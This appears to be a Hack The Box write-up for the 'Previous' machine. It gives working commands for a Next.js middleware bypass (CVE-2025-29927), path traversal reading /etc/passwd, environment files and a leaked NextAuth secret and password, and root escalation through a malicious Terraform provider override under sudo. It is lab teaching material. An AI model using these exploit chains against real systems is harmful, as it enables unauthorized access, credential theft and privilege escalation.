HTB | Previous

Machine - https://app.hackthebox.com/machines/Previous

IP - 10.10.11.83

NMAP

└─$ nmap -sC -sV -p 22,80 10.10.11.83 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-26 09:32 IST
Nmap scan report for previous.htb (10.10.11.83)
Host is up (0.27s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: PreviousJS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 23.19 seconds

Port 80

directory enum

└─$ dirsearch -u <http://previous.htb/> -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See <https://setuptools.pypa.io/en/latest/pkg_resources.html>
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                                                                                                                              
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                              
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/anurag/htb/Previous/reports/http_previous.htb/__25-08-26_09-34-18.txt

Target: <http://previous.htb/>

[09:34:18] Starting:                                                                                                                                                                                                                                                          
[09:35:10] 307 -   35B  - /api  ->  /api/auth/signin?callbackUrl=%2Fapi     
[09:35:10] 307 -   39B  - /api-doc  ->  /api/auth/signin?callbackUrl=%2Fapi-doc
[09:35:10] 307 -   39B  - /api.log  ->  /api/auth/signin?callbackUrl=%2Fapi.log
[09:35:10] 307 -   40B  - /api-docs  ->  /api/auth/signin?callbackUrl=%2Fapi-docs
[09:35:10] 307 -   39B  - /api.php  ->  /api/auth/signin?callbackUrl=%2Fapi.php
[09:35:10] 307 -   60B  - /api/2/issue/createmeta  ->  /api/auth/signin?callbackUrl=%2Fapi%2F2%2Fissue%2Fcreatemeta
[09:35:10] 307 -   38B  - /api.py  ->  /api/auth/signin?callbackUrl=%2Fapi.py
[09:35:10] 307 -   45B  - /api/apidocs  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fapidocs
[09:35:10] 307 -   54B  - /api/application.wadl  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fapplication.wadl
[09:35:10] 307 -   41B  - /api/api  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fapi
[09:35:10] 307 -   46B  - /api/api-docs  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fapi-docs
[09:35:10] 307 -   60B  - /api/apidocs/swagger.json  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fapidocs%2Fswagger.json
[09:35:10] 307 -   44B  - /api/config  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fconfig
[09:35:10] 307 -   42B  - /api/docs  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fdocs
[09:35:10] 307 -   52B  - /api/cask/graphql  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fcask%2Fgraphql
[09:35:10] 307 -   43B  - /api/batch  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fbatch
[09:35:10] 307 -   47B  - /api/error_log  ->  /api/auth/signin?callbackUrl=%2Fapi%2Ferror_log
[09:35:10] 307 -   48B  - /api/index.html  ->  /api/auth/signin?callbackUrl=%2Fapi%2Findex.html
[09:35:10] 307 -   44B  - /api/jsonws  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fjsonws
[09:35:10] 307 -   45B  - /api/profile  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fprofile
[09:35:10] 307 -   53B  - /api/jsonws/invoke  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fjsonws%2Finvoke
[09:35:10] 307 -   48B  - /api/login.json  ->  /api/auth/signin?callbackUrl=%2Fapi%2Flogin.json
[09:35:10] 307 -   73B  - /api/package_search/v4/documentation  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fpackage_search%2Fv4%2Fdocumentation
[09:35:10] 307 -   47B  - /api/snapshots  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fsnapshots
[09:35:10] 307 -   43B  - /api/proxy  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fproxy
[09:35:10] 307 -   45B  - /api/swagger  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fswagger
[09:35:10] 307 -   50B  - /api/swagger.yaml  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fswagger.yaml
[09:35:10] 307 -   57B  - /api/spec/swagger.json  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fspec%2Fswagger.json
[09:35:10] 307 -   53B  - /api/swagger-ui.html  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fswagger-ui.html
[09:35:10] 307 -   50B  - /api/swagger.json  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fswagger.json
[09:35:10] 307 -   58B  - /api/swagger/index.html  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fswagger%2Findex.html
[09:35:10] 307 -   49B  - /api/swagger.yml  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fswagger.yml
[09:35:10] 307 -   55B  - /api/swagger/swagger  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fswagger%2Fswagger
[09:35:10] 307 -   58B  - /api/swagger/ui/index  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fswagger%2Fui%2Findex
[09:35:10] 307 -   67B  - /api/swagger/static/index.html  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fswagger%2Fstatic%2Findex.html
[09:35:10] 307 -   52B  - /api/timelion/run  ->  /api/auth/signin?callbackUrl=%2Fapi%2Ftimelion%2Frun
[09:35:10] 307 -   40B  - /api/v1  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fv1
[09:35:11] 307 -   55B  - /api/v1/swagger.yaml  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fv1%2Fswagger.yaml
[09:35:11] 307 -   40B  - /api/v2  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fv2
[09:35:11] 307 -   55B  - /api/v1/swagger.json  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fv1%2Fswagger.json
[09:35:11] 307 -   62B  - /api/v2/helpdesk/discover  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fv2%2Fhelpdesk%2Fdiscover
[09:35:11] 307 -   55B  - /api/v2/swagger.json  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fv2%2Fswagger.json
[09:35:11] 307 -   40B  - /api/v3  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fv3
[09:35:11] 307 -   40B  - /api/v4  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fv4
[09:35:11] 307 -   55B  - /api/v2/swagger.yaml  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fv2%2Fswagger.yaml
[09:35:11] 307 -   74B  - /api/vendor/phpunit/phpunit/phpunit  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fvendor%2Fphpunit%2Fphpunit%2Fphpunit
[09:35:11] 307 -   45B  - /api/version  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fversion
[09:35:11] 307 -   38B  - /apidoc  ->  /api/auth/signin?callbackUrl=%2Fapidoc
[09:35:11] 307 -   39B  - /apidocs  ->  /api/auth/signin?callbackUrl=%2Fapidocs
[09:35:11] 307 -   60B  - /apiserver-aggregator-ca.cert  ->  /api/auth/signin?callbackUrl=%2Fapiserver-aggregator-ca.cert
[09:35:11] 307 -   44B  - /apibuild.pyc  ->  /api/auth/signin?callbackUrl=%2Fapibuild.pyc
[09:35:11] 307 -   44B  - /api/whoami  ->  /api/auth/signin?callbackUrl=%2Fapi%2Fwhoami
[09:35:11] 307 -   36B  - /apis  ->  /api/auth/signin?callbackUrl=%2Fapis
[09:35:11] 307 -   57B  - /apiserver-aggregator.cert  ->  /api/auth/signin?callbackUrl=%2Fapiserver-aggregator.cert
[09:35:11] 307 -   56B  - /apiserver-aggregator.key  ->  /api/auth/signin?callbackUrl=%2Fapiserver-aggregator.key
[09:35:11] 307 -   49B  - /apiserver-key.pem  ->  /api/auth/signin?callbackUrl=%2Fapiserver-key.pem
[09:35:11] 307 -   52B  - /apiserver-client.crt  ->  /api/auth/signin?callbackUrl=%2Fapiserver-client.crt
[09:35:14] 308 -   19B  - /axis//happyaxis.jsp  ->  /axis/happyaxis.jsp     
[09:35:14] 308 -   24B  - /axis2-web//HappyAxis.jsp  ->  /axis2-web/HappyAxis.jsp
[09:35:14] 308 -   30B  - /axis2//axis2-web/HappyAxis.jsp  ->  /axis2/axis2-web/HappyAxis.jsp
[09:35:21] 308 -   52B  - /Citrix//AccessPlatform/auth/clientscripts/cookies.js  ->  /Citrix/AccessPlatform/auth/clientscripts/cookies.js
[09:35:31] 307 -   36B  - /docs  ->  /api/auth/signin?callbackUrl=%2Fdocs   
[09:35:31] 307 -   41B  - /docs.json  ->  /api/auth/signin?callbackUrl=%2Fdocs.json
[09:35:31] 307 -   53B  - /docs/CHANGELOG.html  ->  /api/auth/signin?callbackUrl=%2Fdocs%2FCHANGELOG.html
[09:35:31] 307 -   63B  - /docs/html/admin/ch01.html  ->  /api/auth/signin?callbackUrl=%2Fdocs%2Fhtml%2Fadmin%2Fch01.html
[09:35:31] 307 -   54B  - /docs/export-demo.xml  ->  /api/auth/signin?callbackUrl=%2Fdocs%2Fexport-demo.xml
[09:35:31] 307 -   52B  - /docs/changelog.txt  ->  /api/auth/signin?callbackUrl=%2Fdocs%2Fchangelog.txt
[09:35:31] 307 -   66B  - /docs/html/admin/ch01s04.html  ->  /api/auth/signin?callbackUrl=%2Fdocs%2Fhtml%2Fadmin%2Fch01s04.html
[09:35:31] 307 -   64B  - /docs/html/admin/index.html  ->  /api/auth/signin?callbackUrl=%2Fdocs%2Fhtml%2Fadmin%2Findex.html
[09:35:31] 307 -   66B  - /docs/html/admin/ch03s07.html  ->  /api/auth/signin?callbackUrl=%2Fdocs%2Fhtml%2Fadmin%2Fch03s07.html
[09:35:31] 307 -   70B  - /docs/html/developer/ch03s15.html  ->  /api/auth/signin?callbackUrl=%2Fdocs%2Fhtml%2Fdeveloper%2Fch03s15.html
[09:35:31] 307 -   67B  - /docs/html/developer/ch02.html  ->  /api/auth/signin?callbackUrl=%2Fdocs%2Fhtml%2Fdeveloper%2Fch02.html
[09:35:31] 307 -   56B  - /docs/html/index.html  ->  /api/auth/signin?callbackUrl=%2Fdocs%2Fhtml%2Findex.html
[09:35:31] 307 -   51B  - /docs/swagger.json  ->  /api/auth/signin?callbackUrl=%2Fdocs%2Fswagger.json
[09:35:31] 307 -   54B  - /docs/maintenance.txt  ->  /api/auth/signin?callbackUrl=%2Fdocs%2Fmaintenance.txt
[09:35:31] 307 -   51B  - /docs/updating.txt  ->  /api/auth/signin?callbackUrl=%2Fdocs%2Fupdating.txt
[09:35:31] 307 -   38B  - /docs51  ->  /api/auth/signin?callbackUrl=%2Fdocs51
[09:35:33] 308 -   39B  - /engine/classes/swfupload//swfupload.swf  ->  /engine/classes/swfupload/swfupload.swf
[09:35:33] 308 -   42B  - /engine/classes/swfupload//swfupload_f9.swf  ->  /engine/classes/swfupload/swfupload_f9.swf
[09:35:36] 308 -   27B  - /extjs/resources//charts.swf  ->  /extjs/resources/charts.swf
[09:35:42] 308 -   37B  - /html/js/misc/swfupload//swfupload.swf  ->  /html/js/misc/swfupload/swfupload.swf
[09:36:24] 200 -    3KB - /signin                                           
                                                                             
Task Completed

whatweb

└─$ whatweb -v -a 3 <http://previous.htb/>                                                                                                             
WhatWeb report for <http://previous.htb/>
Status    : 200 OK
Title     : <None>
IP        : 10.10.11.83
Country   : RESERVED, ZZ

Summary   : Email[jeremy@previous.htb], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], nginx[1.18.0], Script[application/json], X-Powered-By[Next.js]

Detected Plugins:
[ Email ]
        Extract email addresses. Find valid email address and 
        syntactically invalid email addresses from mailto: link 
        tags. We match syntactically invalid links containing 
        mailto: to catch anti-spam email addresses, eg. bob at 
        gmail.com. This uses the simplified email regular 
        expression from 
        <http://www.regular-expressions.info/email.html> for valid 
        email address matching. 

        String       : jeremy@previous.htb
        String       : jeremy@previous.htb

[ HTML5 ]
        HTML version 5, detected by the doctype declaration 

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        OS           : Ubuntu Linux
        String       : nginx/1.18.0 (Ubuntu) (from server string)

[ Script ]
        This plugin detects instances of script HTML elements and 
        returns the script language/type. 

        String       : application/json

[ X-Powered-By ]
        X-Powered-By HTTP header 

        String       : Next.js (from x-powered-by string)

[ nginx ]
        Nginx (Engine-X) is a free, open-source, high-performance 
        HTTP server and reverse proxy, as well as an IMAP/POP3 
        proxy server. 

        Version      : 1.18.0
        Website     : <http://nginx.net/>

HTTP Headers:
        HTTP/1.1 200 OK
        Server: nginx/1.18.0 (Ubuntu)
        Date: Tue, 26 Aug 2025 04:08:06 GMT
        Content-Type: text/html; charset=utf-8
        Transfer-Encoding: chunked
        Connection: close
        X-Powered-By: Next.js
        ETag: "17m2fyh3hl048k"
        Vary: Accept-Encoding
        Content-Encoding: gzip

found a user jeremy

On looking around we found a callback URL to localhost:3000

Foothold/Shell

Shell as Jeremy

CVE-2025-29927

We found that Next JS 15.2.2 is using

We found the CVE-2025-29927 for that version

Next.js uses middleware to enforce security policies such as authentication and authorization before routing requests. To avoid infinite loops during internal redirects or server-side rendering (SSR), it includes a special header x-middleware-subrequest in internal requests.
The flaw lies in the fact that this header is blindly trusted by the framework without verifying its origin. An attacker can spoof this header in a request, tricking the server into skipping the middleware layer entirely. This effectively bypasses all access control logic enforced by middleware, granting unauthorized access to protected routes.

Now we need to find out the endpoint

We can add X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware header (refer - https://github.com/UNICORDev/exploit-CVE-2025-29927)

└─$ curl -i -k "<http://previous.htb/docs/changelog.txt>"                                                                                     
HTTP/1.1 307 Temporary Redirect
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 26 Aug 2025 04:30:25 GMT
Transfer-Encoding: chunked
Connection: keep-alive
location: /api/auth/signin?callbackUrl=%2Fdocs%2Fchangelog.txt

/api/auth/signin?callbackUrl=%2Fdocs%2Fchangelog.txt                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Previous]
└─$ curl -i -k "<http://previous.htb/docs/changelog.txt>" -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware"
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 26 Aug 2025 04:30:29 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1467
Connection: keep-alive
X-Powered-By: Next.js
ETag: "ohdm54fghz14r"
Vary: Accept-Encoding

<!DOCTYPE html><html><head><meta charSet="utf-8" data-next-head=""/><meta name="viewport" content="width=device-width" data-next-head=""/><link rel="preload" href="/_next/static/css/9a1ff1f4870b5a50.css" as="style"/><link rel="stylesheet" href="/_next/static/css/9a1ff1f4870b5a50.css" data-n-g=""/><noscript data-n-css=""></noscript><script defer="" nomodule="" src="/_next/static/chunks/polyfills-42372ed130431b0a.js"></script><script src="/_next/static/chunks/webpack-cb370083d4f9953f.js" defer=""></script><script src="/_next/static/chunks/framework-ee17a4c43a44d3e2.js" defer=""></script><script src="/_next/static/chunks/main-0221d9991a31a63c.js" defer=""></script><script src="/_next/static/chunks/pages/_app-95f33af851b6322a.js" defer=""></script><script src="/_next/static/chunks/8-fd0c493a642e766e.js" defer=""></script><script src="/_next/static/chunks/0-c54fcec2d27b858d.js" defer=""></script><script src="/_next/static/chunks/pages/docs/%5Bsection%5D-31d8b831c1e60f26.js" defer=""></script><script src="/_next/static/qVDR2cKpRgqCslEh-llk9/_buildManifest.js" defer=""></script><script src="/_next/static/qVDR2cKpRgqCslEh-llk9/_ssgManifest.js" defer=""></script></head><body><div id="__next"><div>Error</div></div><script id="__NEXT_DATA__" type="application/json">{"props":{"pageProps":{}},"page":"/docs/[section]","query":{},"buildId":"qVDR2cKpRgqCslEh-llk9","nextExport":true,"autoExport":true,"isFallback":false,"scriptLoader":[]}</script></body></html>

We can see the docs

Looking around the docs, we found the endpoint http://previous.htb/api/download?example=hello-world.ts

We can read /etc/passwd

└─$ curl -i -k "<http://previous.htb/api/download?example=../../../../etc/passwd>" -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware"
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 26 Aug 2025 04:46:28 GMT
Content-Type: application/zip
Content-Length: 787
Connection: keep-alive
Content-Disposition: attachment; filename=../../../../etc/passwd
ETag: "41amqg1v4m26j"

root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
node:x:1000:1000::/home/node:/bin/sh
nextjs:x:1001:65533::/home/nextjs:/sbin/nologin

We can also read the environment variable

└─$ curl -k "<http://previous.htb/api/download?example=../../../../proc/self/environ>" -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware"  --output environ.txt 
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   216  100   216    0     0    186      0  0:00:01  0:00:01 --:--:--   186
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Previous]
└─$ cat environ.txt                                                                                                                                                                            
NODE_VERSION=18.20.8HOSTNAME=0.0.0.0YARN_VERSION=1.22.22SHLVL=1PORT=3000HOME=/home/nextjsPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binNEXT_TELEMETRY_DISABLED=1PWD=/appNODE_ENV=production

We can also confirm NEXTAUTH usage

└─$ curl -k "<http://previous.htb/api/download?example=../../../../app/package.json>" -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware" 
{
  "private": true,
  "scripts": {
    "dev": "next dev",
    "build": "next build"
  },
  "dependencies": {
    "@mdx-js/loader": "^3.1.0",
    "@mdx-js/react": "^3.1.0",
    "@next/mdx": "^15.3.0",
    "@tailwindcss/postcss": "^4.1.3",
    "@tailwindcss/typography": "^0.5.16",
    "@types/mdx": "^2.0.13",
    "next": "^15.2.2",
    "next-auth": "^4.24.11",
    "postcss": "^8.5.3",
    "react": "^18.2.0",
    "react-dom": "^18.2.0",
    "tailwindcss": "^4.1.3"
  },
  "devDependencies": {
    "@types/node": "22.14.0",
    "@types/react": "19.1.0",
    "typescript": "5.8.3"
  }
}

the package.json confirms this is a Next.js app with NextAuth. That’s a big hint because NextAuth always requires secrets (NEXTAUTH_SECRET, NEXTAUTH_URL, plus provider credentials like GitHub/Google/LDAP/etc.).

we found NEXTAUTH_SECRET

└─$ curl -k "<http://previous.htb/api/download?example=../../../../app/.env>" -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware" 

NEXTAUTH_SECRET=82a464f1c3509a81d5c973c31a23c61a

Asking ChatGPT for some endpoints, and one of them revealed Jeremy’s credentials

└─$ curl -k "<http://previous.htb/api/download?example=../../../../app/.next/server/pages/api/auth/%5B...nextauth%5D.js>" -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware"       
"use strict";(()=>{var e={};e.id=651,e.ids=[651],e.modules={3480:(e,n,r)=>{e.exports=r(5600)},5600:e=>{e.exports=require("next/dist/compiled/next-server/pages-api.runtime.prod.js")},6435:(e,n)=>{Object.defineProperty(n,"M",{enumerable:!0,get:function(){return function e(n,r){return r in n?n[r]:"then"in n&&"function"==typeof n.then?n.then(n=>e(n,r)):"function"==typeof n&&"default"===r?n:void 0}}})},8667:(e,n)=>{Object.defineProperty(n,"A",{enumerable:!0,get:function(){return r}});var r=function(e){return e.PAGES="PAGES",e.PAGES_API="PAGES_API",e.APP_PAGE="APP_PAGE",e.APP_ROUTE="APP_ROUTE",e.IMAGE="IMAGE",e}({})},9832:(e,n,r)=>{r.r(n),r.d(n,{config:()=>l,default:()=>P,routeModule:()=>A});var t={};r.r(t),r.d(t,{default:()=>p});var a=r(3480),s=r(8667),i=r(6435);let u=require("next-auth/providers/credentials"),o={session:{strategy:"jwt"},providers:[r.n(u)()({name:"Credentials",credentials:{username:{label:"User",type:"username"},password:{label:"Password",type:"password"}},authorize:async e=>e?.username==="jeremy"&&e.password===(process.env.ADMIN_SECRET??"MyNameIsJeremyAndILovePancakes")?{id:"1",name:"Jeremy"}:null})],pages:{signIn:"/signin"},secret:process.env.NEXTAUTH_SECRET},d=require("next-auth"),p=r.n(d)()(o),P=(0,i.M)(t,"default"),l=(0,i.M)(t,"config"),A=new a.PagesAPIRouteModule({definition:{kind:s.A.PAGES_API,page:"/api/auth/[...nextauth]",pathname:"/api/auth/[...nextauth]",bundlePath:"",filename:""},userland:t})}};var n=require("../../../webpack-api-runtime.js");n.C(e);var r=n(n.s=9832);module.exports=r})();

Let’s use prettier for a better understanding

"use strict";
(() => {
  var e = {};
  ((e.id = 651),
    (e.ids = [651]),
    (e.modules = {
      3480: (e, n, r) => {
        e.exports = r(5600);
      },
      5600: (e) => {
        e.exports = require("next/dist/compiled/next-server/pages-api.runtime.prod.js");
      },
      6435: (e, n) => {
        Object.defineProperty(n, "M", {
          enumerable: !0,
          get: function () {
            return function e(n, r) {
              return r in n
                ? n[r]
                : "then" in n && "function" == typeof n.then
                  ? n.then((n) => e(n, r))
                  : "function" == typeof n && "default" === r
                    ? n
                    : void 0;
            };
          },
        });
      },
      8667: (e, n) => {
        Object.defineProperty(n, "A", {
          enumerable: !0,
          get: function () {
            return r;
          },
        });
        var r = (function (e) {
          return (
            (e.PAGES = "PAGES"),
            (e.PAGES_API = "PAGES_API"),
            (e.APP_PAGE = "APP_PAGE"),
            (e.APP_ROUTE = "APP_ROUTE"),
            (e.IMAGE = "IMAGE"),
            e
          );
        })({});
      },
      9832: (e, n, r) => {
        (r.r(n),
          r.d(n, { config: () => l, default: () => P, routeModule: () => A }));
        var t = {};
        (r.r(t), r.d(t, { default: () => p }));
        var a = r(3480),
          s = r(8667),
          i = r(6435);
        let u = require("next-auth/providers/credentials"),
          o = {
            session: { strategy: "jwt" },
            providers: [
              r.n(u)()({
                name: "Credentials",
                credentials: {
                  username: { label: "User", type: "username" },
                  password: { label: "Password", type: "password" },
                },
                authorize: async (e) =>
                  e?.username === "jeremy" &&
                  e.password ===
                    (process.env.ADMIN_SECRET ??
                      "MyNameIsJeremyAndILovePancakes")
                    ? { id: "1", name: "Jeremy" }
                    : null,
              }),
            ],
            pages: { signIn: "/signin" },
            secret: process.env.NEXTAUTH_SECRET,
          },
          d = require("next-auth"),
          p = r.n(d)()(o),
          P = (0, i.M)(t, "default"),
          l = (0, i.M)(t, "config"),
          A = new a.PagesAPIRouteModule({
            definition: {
              kind: s.A.PAGES_API,
              page: "/api/auth/[...nextauth]",
              pathname: "/api/auth/[...nextauth]",
              bundlePath: "",
              filename: "",
            },
            userland: t,
          });
      },
    }));
  var n = require("../../../webpack-api-runtime.js");
  n.C(e);
  var r = n((n.s = 9832));
  module.exports = r;
})();

And we can SSH as Jeremy and found user.txt

└─$ ssh jeremy@10.10.11.83 
The authenticity of host '10.10.11.83 (10.10.11.83)' can't be established.
ED25519 key fingerprint is SHA256:TgNhCKF6jUX7MG8TC01/MUj/+u0EBasUVsdSQMHdyfY.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:59: [hashed name]
    ~/.ssh/known_hosts:64: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.83' (ED25519) to the list of known hosts.
jeremy@10.10.11.83's password: 
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-152-generic x86_64)

 * Documentation:  <https://help.ubuntu.com>
 * Management:     <https://landscape.canonical.com>
 * Support:        <https://ubuntu.com/pro>

 System information as of Tue Aug 26 05:01:50 AM UTC 2025

  System load:  0.0               Processes:             221
  Usage of /:   69.0% of 8.76GB   Users logged in:       1
  Memory usage: 9%                IPv4 address for eth0: 10.10.11.83
  Swap usage:   0%

Expanded Security Maintenance for Applications is not enabled.

1 update can be applied immediately.
1 of these updates is a standard security update.
To see these additional updates run: apt list --upgradable

1 additional security update can be applied with ESM Apps.
Learn more about enabling ESM Apps service at <https://ubuntu.com/esm>

Failed to connect to <https://changelogs.ubuntu.com/meta-release-lts>. Check your Internet connection or proxy settings

Last login: Tue Aug 26 05:01:51 2025 from 10.10.16.3
jeremy@previous:~$ id
uid=1000(jeremy) gid=1000(jeremy) groups=1000(jeremy)
jeremy@previous:~$ ls
docker  user.txt

Privilege Escalation

We can run teraform as root

jeremy@previous:/tmp$ sudo -l
Matching Defaults entries for jeremy on previous:
    !env_reset, env_delete+=PATH, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, use_pty

User jeremy may run the following commands on previous:
    (root) /usr/bin/terraform -chdir\\=/opt/examples apply

we can see the main.tf

jeremy@previous:~$ cat /opt/examples/main.tf
terraform {
  required_providers {
    examples = {
      source = "previous.htb/terraform/examples"
    }
  }
}

variable "source_path" {
  type = string
  default = "/root/examples/hello-world.ts"

  validation {
    condition = strcontains(var.source_path, "/root/examples/") && !strcontains(var.source_path, "..")
    error_message = "The source_path must contain '/root/examples/'."
  }
}

provider "examples" {}

resource "examples_example" "example" {
  source_path = var.source_path
}

output "destination_path" {
  value = examples_example.example.destination_path
}
jeremy@previous:~$

It defines a variable source_path, defaulting to /root/examples/hello-world.ts.
Validation forces the value to contain /root/examples/ and blocks ...
It uses a custom provider: previous.htb/terraform/examples.
The resource examples_example takes that file as input and produces some destination_path.

Let’ find the provider binary because In Terraform, terraform itself is just an orchestrator. All the "real work" (like creating files, copying stuff, running code) is done by provider binaries.

	jeremy@previous:/tmp$ find / -name "terraform-provider-examples*" 2>/dev/null
/opt/terraform-provider-examples
/usr/local/go/bin/terraform-provider-examples
jeremy@previous:/tmp$

Now we can create our terraform-provider-examples and we can change the pointing of the previous.htb/terraform/examples to our provider path

jeremy@previous:/tmp$ cat > /tmp/terraform-provider-examples << 'EOF'
#!/bin/bash
chmod +s /bin/bash
cp /bin/bash /tmp/rootbash && chmod +xs /tmp/rootbash
echo '{"malicious": "provider"}'                    
EOF

jeremy@previous:/tmp$ chmod +x terraform-provider-examples

jeremy@previous:/tmp$ cat > /tmp/terraform.rc << 'EOF'
provider_installation {
  dev_overrides {
    "previous.htb/terraform/examples" = "/tmp"
  }
  direct {}
}
EOF

jeremy@previous:/tmp$ export TF_CLI_CONFIG_FILE=/tmp/terraform.rc

jeremy@previous:/tmp$ sudo /usr/bin/terraform -chdir=/opt/examples apply
╷
│ Warning: Provider development overrides are in effect
│ 
│ The following provider development overrides are set in the CLI configuration:
│  - previous.htb/terraform/examples in /tmp
│ 
│ The behavior may therefore not match any released version of the provider and applying changes may cause the state to become incompatible with published releases.
╵
╷
│ Error: Failed to load plugin schemas
│ 
│ Error while loading schemas for plugin components: Failed to obtain provider schema: Could not load the schema for provider previous.htb/terraform/examples: failed to instantiate provider "previous.htb/terraform/examples" to obtain schema: Unrecognized remote plugin
│ message: {"malicious": "provider"}
│ This usually means
│   the plugin was not compiled for this architecture,
│   the plugin is missing dynamic-link libraries necessary to run,
│   the plugin is not executable by this process due to file permissions, or
│   the plugin failed to negotiate the initial go-plugin protocol handshake
│ 
│ Additional notes about plugin:
│   Path: /tmp/terraform-provider-examples
│   Mode: -rwxrwxr-x
│   Owner: 1000 [jeremy] (current: 0 [root])
│   Group: 1000 [jeremy] (current: 0 [root])
│ ..
╵
jeremy@previous:/tmp$

Now we can have root

jeremy@previous:/tmp$ /tmp/rootbash -p
rootbash-5.1# id
uid=1000(jeremy) gid=1000(jeremy) euid=0(root) egid=0(root) groups=0(root),1000(jeremy)
rootbash-5.1#

and get root.txt

rootbash-5.1# ls /root/root.txt 
/root/root.txt

PreviousHTB | Editor NextHTB | Angler

Last updated 7 days ago

hashtagNMAP

hashtagPort 80

hashtagFoothold/Shell

hashtagShell as Jeremy

hashtagCVE-2025-29927

hashtagPrivilege Escalation